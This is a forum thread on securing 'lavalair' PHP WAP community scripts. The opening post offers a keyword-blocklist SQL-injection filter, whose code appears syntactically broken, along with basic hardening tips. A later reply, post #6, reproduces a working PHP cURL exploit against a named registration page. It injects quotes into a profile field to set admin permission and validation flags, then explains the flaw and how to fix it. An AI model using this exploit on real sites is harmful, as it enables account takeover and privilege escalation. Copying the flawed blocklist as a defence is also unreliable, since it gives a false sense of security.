How to secure lavalair ALL versions

Collapse
X
Collapse
 
  • Page of 5
  • Filter
  • Time
  • Show
Clear All
new posts
Previous 1 2 3 4 5 template Next
    #1

    How to secure lavalair ALL versions

    How to secure lavalair ALL versions!!!!!!!

    Wapspire v1,v2
    fummobile v1
    aarawap v1

    Yes you hear me right they all are lavalair scripts !!!!!

    First Lets get to know how...

    Place this in your core.php

    PHP Code:
    function check_injection() 
      { 
            $badchars = array("DROP","TRUNCATE""SELECT""UPDATE""DELETE" "UNION""WHERE""FROM","INSERT","ORDER BY"); 
       
        foreach(    $_REQUEST  as $value
        { 
          if(    in_array(strtoupper($value), $badchars)) 
          { 
              $logfile'logs/log.txt'//chmod 777 
    $IP $_SERVER['REMOTE_ADDR']; 
    $logdetailsdate("F j, Y, g:i a") . ': ' '<a href=http://dnsstuff.com/tools/city.ch?ip='.$_SERVER['REMOTE_ADDR'].' target=_blank>'.$_SERVER['REMOTE_ADDR'].'</a>'
    $fp fopen($logfile"r+"); 
    fwrite($fp$logdetailsstrlen($logdetails)); 
    fclose($fp); 

               header('Location:http://google.com'); 

          } 
          else 
          { 
                $check preg_split("//"$value, -1PREG_SPLIT_OFFSET_CAPTURE); 
    foreach(    $check as $char)
    {
    if(    in_array(strtoupper($char), $badchars))
    {
              $logfile'logs/log.txt'
    $IP $_SERVER['REMOTE_ADDR']; 
    $logdetailsdate("F j, Y, g:i a") . ': ' '<a href=http://dnsstuff.com/tools/city.ch?ip='.$_SERVER['REMOTE_ADDR'].' target=_blank>'.$_SERVER['REMOTE_ADDR'].'</a>'
    $fp fopen($logfile"r+"); 
    fwrite($fp$logdetailsstrlen($logdetails)); 
    fclose($fp); 

                    header('Location:http://google.com'); 
    }}}} 

    Add this too ALL of your headers Before <html or <doc type Under core.php include file

    "
    include("core.php");
    check_injection();
    "

    Step 2:

    Do Not Host a UPLOADER

    Step 3:

    Don`t let users hotlink images as there avatar delete this asap from your site. or host it with a php thumb script you may search this forum for it !!

    Step 4:

    Do not save logs in logs or any txt files to members/owners info

    Step 5

    Do not use easy passwords like eg: 123456 , abc1234 , password , guest , john , orbit

    Most guest password is your username as your password you must not sign up like

    username: john1942
    password: john1942

    End of page.......

    If you still getting hacked / sql / hijacked this means you didn't go thou the steps as i told you...
    Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
    Visit: WapMasterz Coming Back Soon!
    _______
    SCRIPTS FOR SALE BY SUBZERO
    Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
    FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
    _______
    Info & Tips
    php.net
    w3schools.com
    Tags: None
    #2
    this is great thanks.......

    Comment

      #3
      Hope it will work so shell dont works!
      com site: http://vampist.net
      download site: http://wapdloads.net
      fb: http://www.facebook.com/pmplx

      Comment

        #4
        tnx for this man -up-
        Last edited by wapmetal; 09.10.10, 14:50.
        com site: http://vampist.net
        download site: http://wapdloads.net
        fb: http://www.facebook.com/pmplx

        Comment

          #5
          no wapmetal. Just remove the [img=][/img].
          mysterio.al - programming is a functional art

          Comment

            #6
            Here is the tool I used to crack into the target site:


            <?php
            class Browser {
            function __construct($ua="") {
            $this->UserAgent = $ua;
            }
            public $curl, $count, $data,$UserAgent;
            function url($url) { $this->curl = curl_init($url); }
            function fields($count) { $this->count = $count; }
            function data($data) { $this->data = strtolower($data); }
            function send() {
            curl_setopt($this->curl, CURLOPT_POST, $this->count);
            if(!empty($this->UserAgent)) {
            curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);
            }
            curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);
            curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);
            $result = curl_exec($this->curl);
            curl_close($this->curl);
            return $result;
            }

            }

            $uid = "masnun";

            $info = "fear the geek, since you must!',perm='4',validated='1'#";
            $m = new Browser("Samsung SGH C160");
            $m->url("http://kalponik.freehostia.com/web/register.php");
            $m->fields(12);
            $m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month =03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

            print_r($m->send());

            ?>

            The easiest explanation is that LavaLair by default requires magic_quotes_gpc() to be off and it’s insert SQLs are in the format:

            INSERT INTO table_name SET column_1='value_1', column_2 ='value_2'

            So, it becomes easy to inject some single quotes and hash sign to terminate the script and modify it the way you wish.

            My suggestion would be to use Insert SQLs in this way:

            INSERT INTO table_name (column_1,column_2) VALUES ('value_1','value_2')

            And now a little rant about these so hackers… I have heard lots of stories about AyOn and some other freaks terrorizing the LL community… It’s really funny the way the developers never bothered to learn how these scrip kiddies or so-called hackers managed their way in… From the very beginning, I have used J21Community with magic_quotes_gpc turned on and secure SQL queries. That’s one of the important reasons why no J21Community site has been hacked yet by SQL Injection… :D
            (copy from blog)

            Free Mobile Web Scripts by me: Free Youtube Downloader, Tweets Reader, Facebook Wall Posts Reader
            PHP Tutorials: How to Secure Your PHP Script (PHP SECURITY)
            Want to Develop/Edit your WAP/Web Site? Add me to Gtalk (gmail) 'lakshan1989' or PM me.

            Comment

              #7
              thanks for sharing,, uhhm.. I think I have to try it..

              Comment

                #8
                shell script Please read Step 2: AGAIN !!
                Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
                Visit: WapMasterz Coming Back Soon!
                _______
                SCRIPTS FOR SALE BY SUBZERO
                Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
                FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
                _______
                Info & Tips
                php.net
                w3schools.com

                Comment

                  #9
                  Step 2 is the best
                  Did I help you?
                  You can help me too
                  Your donations will help me finance my studies.

                  Comment

                    #10
                    Originally posted by Mysterio3 View Post
                    no wapmetal. Just remove the [img=][/img].
                    yes i have done with it ...thanks a lot
                    com site: http://vampist.net
                    download site: http://wapdloads.net
                    fb: http://www.facebook.com/pmplx

                    Comment

                      #11
                      I hope dis works
                      http://myfacepals.com
                      MYFACEPALS SOCIAL NETWORKsigpic

                      Comment

                        #12
                        Thanks Sub bro !

                        everything is done but still some confusion Step 3 what about the hotlink ? even i using the thumb img for avatars but how can block if anybody plase any link in their INFO:

                        like click here
                        [url=http://google.co.in]click here[/ url]

                        sorry if stupid ques.
                        Last edited by wapmaster2; 17.12.09, 10:50.
                        JUST JOIN FOR FUN !
                        http://wapmaster2.com

                        Comment

                          #13
                          Originally posted by wapmaster2 View Post
                          everything is done but still some confusion Step 3 what about the hotlink ? even i using the thumb img for avatars but how can block if anybody plase any link in their INFO:

                          like click here
                          [url=http://google.co.in]click here[/ url]

                          sorry if stupid ques.
                          its a bbcode from your core

                          Comment

                            #14
                            Thanks huwad and yep its unnecessary thing. Blog Club and topic is enough .......... dear how can i add in bbcode to change text color ?

                            means like this [red]your text here[ /red]

                            Thanks !
                            JUST JOIN FOR FUN !
                            http://wapmaster2.com

                            Comment

                              #15
                              Originally posted by wapmaster2 View Post
                              Thanks huwad and yep its unnecessary thing. Blog Club and topic is enough .......... dear how can i add in bbcode to change text color ?

                              means like this [red]your text here[ /red]

                              Thanks !
                              that was posted once or twice before...
                              so you could really use search
                              It's better to keep your mouth shut and give the impression that you're stupid, than to open it and remove all doubt.
                              ⓣⓗⓔ ⓠⓤⓘⓔⓣⓔⓡ ⓨⓞⓤ ⓑⓔ©ⓞⓜⓔ, ⓣⓗⓔ ⓜⓞⓡⓔ ⓨⓞⓤ ⓐⓡⓔ ⓐⓑⓛⓔ ⓣⓞ ⓗⓔⓐⓡ !
                              ιη тнєσяу, тнє ρяα¢тι¢є ιѕ α яєѕυℓт σƒ тнє тнєσяу, вυт ιη ρяα¢тι¢є ιѕ тнє σρρσѕιтє.
                              キノgんイノ刀g 4 ア乇ムc乇 ノ丂 レノズ乇 キucズノ刀g 4 √ノ尺gノ刀ノイリ!

                              Comment

                              Previous 1 2 3 4 5 template Next
                              Working...
                              X